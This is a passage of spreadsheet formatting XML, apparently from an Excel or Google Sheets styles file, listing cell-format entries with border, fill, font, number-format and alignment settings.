      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="22" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="23" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="3" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="9" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="23" fillId="8" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="5" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="9" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="12" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="23" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="9" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="28" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="28" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="29" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="7" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="5" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="2" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="22" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="7" numFmtId="3" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="5" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="12" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="26" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="2" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="9" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="2" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="2" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="3" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="4" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="4" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="4" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="5" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="11" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="11" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="12" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="11" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="11" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="12" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="16" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="8" fontId="16" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="27" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="32" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="36" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="36" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="9" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="9" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="9" fillId="9" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="14" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="9" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="1" fillId="12" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="15" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="15" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="15" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="12" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="37" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="16" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="16" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="39" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="17" fontId="39" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="28" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="28" fillId="7" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="7" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="29" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="8" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="7" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="18" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="18" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="9" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="41" numFmtId="1" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="1" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="30" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="16" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="31" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="0" fillId="12" fontId="4" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="1" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="2" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="3" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="1" fillId="13" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="32" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="33" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="10" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="11" fillId="12" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="7" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="29" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
